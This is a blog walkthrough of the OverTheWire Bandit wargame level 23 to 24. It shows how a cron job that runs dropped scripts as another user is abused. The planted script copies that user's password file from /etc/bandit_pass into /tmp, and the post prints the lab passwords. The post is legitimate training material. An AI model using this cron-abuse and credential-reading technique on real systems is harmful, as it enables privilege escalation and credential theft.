What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.

2014-01-23

OverTheWire - Bandit - Level 23 to Level 24

Description:

Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around...
Commands you may need to solve this level
cron, crontab, crontab(5) (use "man 5 crontab" to access this)
Solution:
  1. [Comment] Using SSH to connect the server
  2. sp@simple-plan:~|=> ssh bandit23@bandit.labs.overthewire.org
    ...
    bandit23@bandit.labs.overthewire.org's password: jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
  3. [Comment] Using cd command to change the shell working directory
  4. bandit23@melinda:~$ cd /etc/cron.d
  5. [Comment] Using ls command to list directory contents
  6. bandit23@melinda:/etc/cron.d$ ls
    boobiesbot-checkcronjob_bandit24manpage3_resetpw_jobnatas26_cleanupsemtex0-ppcsemtex6vortex0
    cron-apteloi0natas-session-toucherphp5semtex10semtex8vortex20
    cronjob_bandit22eloi1natas-statssemtex0-32semtex12semtex9vulnbot0-check
    cronjob_bandit23hintbot-checknatas25_cleanupsemtex0-64semtex5sysstatvulnbot1-check
  7. [Comment] Using cat command to output file's contents
  8. bandit23@melinda:/etc/cron.d$ cat cronjob_bandit24 
    * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
  9. [Comment] Using cat command to check the script content
  10. bandit23@melinda:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
    #!/bin/bash
    
    myname=$(whoami)
    
    cd /var/spool/$myname
    echo "Executing and deleting all scripts in /var/spool/$myname:"
    for i in *;
    do
        echo "Handling $i"
        ./$i
        rm -f $i
    done
    
  11. [Comment] Now, we know that all the scripts in /var/spool/bandit24 will be executed once and then removed immediately
  12. [Comment] Create a temporary directory
  13. bandit23@melinda:/var/spool/bandit24$ mkdir -p /tmp/level24
  14. bandit23@melinda:/var/spool/bandit24$ cd /tmp/level24
  15. [Comment] Create our script to fetch out the passowd for next level and store it in the temporary directory
  16. bandit23@melinda:/tmp/level24$ vim sp.sh
    #!/bin/sh
    cat /etc/bandit_pass/bandit24 >> /tmp/level24/bandit24
    touch /tmp/level24/ok
  17. [Comment] Change the privileges
  18. bandit23@melinda:/tmp/level24$ chmod 777 sp.sh 
  19. [Comment] Copy our script to /var/spool/bandit24/, and it would be executed in a minute
  20. bandit23@melinda:/tmp/level24$ cp sp.sh /var/spool/bandit24/
  21. bandit23@melinda:/tmp/level24$ ls
    bandit24  ok  sp.sh
  22. [Comment] Using cat command to fetch out the password
  23. bandit23@melinda:/tmp/level24$ cat bandit24 
    UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
  24. [Comment] Using exit command to disconnect connection to server
  25. bandit23@melinda:/etc/cron.d$ exit
    logout
    Connection to bandit.labs.overthewire.org closed.
  26. [Comment] It's done! Saving the password for next level.
Reference:
sshhttp://linuxcommand.org/man_pages/ssh1.html
lshttp://linuxcommand.org/man_pages/ls1.html
cathttp://linuxcommand.org/man_pages/cat1.html
exithttp://linuxcommand.org/man_pages/exit1.html
cdhttp://linuxcommand.org/lc3_man_pages/cdh.html
findhttp://linuxcommand.org/man_pages/find1.html
grephttp://linuxcommand.org/lc3_man_pages/grep1.html
sorthttp://linuxcommand.org/lc3_man_pages/sort1.html
uniqhttp://linuxcommand.org/man_pages/uniq1.html
stringshttp://linuxcommand.org/man_pages/strings1.html
base64http://linux.die.net/man/1/base64
trhttp://linuxcommand.org/man_pages/tr1.html
aliashttp://linuxcommand.org/man_pages/alias1.html
mkdirhttp://linuxcommand.org/man_pages/mkdir1.html
cphttp://linuxcommand.org/man_pages/cp1.html
xxdhttp://linuxcommand.org/man_pages/xxd1.html
filehttp://linuxcommand.org/man_pages/file1.html
mvhttp://linuxcommand.org/man_pages/mv1.html
gziphttp://linuxcommand.org/man_pages/gzip1.html
bzip2http://linuxcommand.org/man_pages/bzip21.html
tarhttp://linuxcommand.org/man_pages/tar1.html
echohttp://linuxcommand.org/man_pages/echo1.html
nchttp://linuxcommand.org/man_pages/nc1.html
opensslhttp://linuxcommand.org/man_pages/openssl1.html
diffhttp://linuxcommand.org/man_pages/diff1.html
envhttp://linuxcommand.org/man_pages/env1.html
cronhttp://linuxcommand.org/man_pages/cron8.html
crontabhttp://linuxcommand.org/man_pages/crontab1.html
cuthttp://linuxcommand.org/man_pages/cut1.html
md5sumhttp://linuxcommand.org/man_pages/md5sum1.html
chmodhttp://linuxcommand.org/man_pages/chmod1.html

No comments:

Post a Comment